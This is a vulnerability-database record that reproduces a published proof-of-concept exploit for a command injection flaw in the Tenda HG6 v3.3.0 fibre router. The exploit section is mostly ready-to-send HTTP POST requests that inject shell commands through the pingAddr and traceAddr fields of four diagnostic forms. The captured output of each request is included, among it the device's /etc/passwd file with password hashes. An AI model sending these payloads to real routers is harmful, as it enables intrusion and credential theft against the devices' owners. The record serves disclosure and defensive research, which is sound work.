ID

VAR-E-202205-0091


EDB ID

50916


TITLE

Tenda HG6 v3.3.0 - Remote Command Injection - Hardware remote Exploit

Trust: 1.0

sources: EXPLOIT-DB: 50916

DESCRIPTION

Tenda HG6 v3.3.0 - Remote Command Injection.. remote exploit for Hardware platform

Trust: 1.0

sources: EXPLOIT-DB: 50916

AFFECTED PRODUCTS

vendor:tendamodel:hg6scope:eqversion:v3.3.0

Trust: 1.0

vendor:tendamodel:hg6 remotescope:eqversion:3.3.0

Trust: 0.5

sources: PACKETSTORM: 166932 // EXPLOIT-DB: 50916

EXPLOIT

# Exploit Title: Tenda HG6 v3.3.0 - Remote Command Injection
# Exploit Author: LiquidWorm

Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

Vendor: Tenda Technology Co.,Ltd.
Product web page: https://www.tendacn.com
https://www.tendacn.com/product/HG6.html
Affected version: Firmware version: 3.3.0-210926
Software version: v1.1.0
Hardware Version: v1.0
Check Version: TD_HG6_XPON_TDE_ISP

Summary: HG6 is an intelligent routing passive optical network
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),
a voice port to meet users' requirements for enjoying the Internet,
HD IPTV and VoIP multi-service applications.

Desc: The application suffers from an authenticated OS command injection
vulnerability. This can be exploited to inject and execute arbitrary
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters
in formPing, formPing6, formTracert and formTracert6 interfaces.

Tested on: Boa/0.93.15

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2022-5706
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php

22.04.2022

--

ping.asp:
---------

POST /boaform/formPing HTTP/1.1
Host: 192.168.1.1

pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564

---
TZ
app.gwdt
bftpd.conf
buildtime
check_version.txt
config
config.csv
config_default.xml
config_default_hs.xml
dhclient-script
dnsmasq.conf
ethertypes
factory_default.xml
ftpdpassword
group
hardversion
inetd.conf
init.d
inittab
innversion
insdrv.sh
irf
mdev.conf
omci_custom_opt.conf
omci_ignore_mib_tbl.conf
omci_ignore_mib_tbl_10g.conf
omci_mib.cfg
orf
passwd
ppp
profile
protocols
radvd.conf
ramfs.img
rc_boot_dsp
rc_voip
release_date
resolv.conf
rtk_tr142.sh
run_customized_sdk.sh
runoam.sh
runomci.sh
runsdk.sh
samba
scripts
services
setprmt_reject
shells
simplecfgservice.xml
smb.conf
softversion
solar.conf
solar.conf.in
ssl_cert.pem
ssl_key.pem
version
wscd.conf

ping6.asp:
----------

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.1.1

pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp

---
boa.conf
web

tracert.asp:
------------

POST /boaform/formTracert HTTP/1.1
Host: 192.168.1.1

traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp

---
/home/httpd

tracert6.asp:
-------------

POST /boaform/formTracert6 HTTP/1.1
Host: 192.168.1.1

traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp

---
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh
nobody:x:0:0::/tmp:/dev/null
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh

Trust: 1.0

sources: EXPLOIT-DB: 50916

EXPLOIT LANGUAGE

txt

Trust: 1.0

sources: EXPLOIT-DB: 50916

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 50916

TYPE

Remote Command Injection

Trust: 1.0

sources: EXPLOIT-DB: 50916

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:web

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:shell

Trust: 0.5

sources: PACKETSTORM: 166932

CREDITS

LiquidWorm

Trust: 1.0

sources: EXPLOIT-DB: 50916

EXTERNAL IDS

db:ZSLid:ZSL-2022-5706

Trust: 1.5

db:EXPLOIT-DBid:50916

Trust: 1.0

db:PACKETSTORMid:166932

Trust: 0.5

sources: PACKETSTORM: 166932 // EXPLOIT-DB: 50916

SOURCES

db:PACKETSTORMid:166932
db:EXPLOIT-DBid:50916

LAST UPDATE DATE

2022-07-27T09:39:41.158000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:166932date:2022-05-03T14:30:51
db:EXPLOIT-DBid:50916date:2022-05-11T00:00:00